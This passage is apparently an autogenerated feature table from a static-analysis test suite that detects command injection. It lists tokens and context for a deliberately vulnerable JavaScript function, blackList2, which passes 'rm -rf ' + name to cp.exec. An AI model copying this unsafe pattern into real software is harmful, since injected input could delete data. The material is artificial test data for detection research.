Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:14 | process.exit | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:14 | process.exit | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:14 | process.exit | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:14 | process.exit | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:18 | exceptional return of process.exit(-1) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:18 | exceptional return of process.exit(-1) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:18 | exceptional return of process.exit(-1) | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:18 | exceptional return of process.exit(-1) | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:18 | exceptional return of process.exit(-1) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:18 | process.exit(-1) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:18 | process.exit(-1) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:18 | process.exit(-1) | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:18 | process.exit(-1) | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:18 | process.exit(-1) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:11:221:14 | exit | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:11:221:14 | exit | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:11:221:14 | exit | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:11:221:14 | exit | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:11:221:14 | exit | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:16:221:17 | -1 | CalleeFlexibleAccessPath | process.exit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:16:221:17 | -1 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:16:221:17 | -1 | calleeImports | process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:16:221:17 | -1 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:16:221:17 | -1 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:16:221:17 | -1 | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:16:221:17 | -1 | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:16:221:17 | -1 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:16:221:17 | -1 | receiverName | process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:17:221:17 | 1 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:17:221:17 | 1 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:17:221:17 | 1 | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:17:221:17 | 1 | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:17:221:17 | 1 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:3 | cp | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:3 | cp | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:8 | cp.exec | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:26 | cp.exec ... + name) | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:5:224:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:5:224:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:5:224:8 | exec | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:5:224:8 | exec | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:5:224:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:18 | "rm -rf " | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:25 | "rm -rf " + name | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:10:224:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:22:224:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:22:224:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:22:224:25 | name | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:22:224:25 | name | enclosingFunctionName | blackList2 | +| 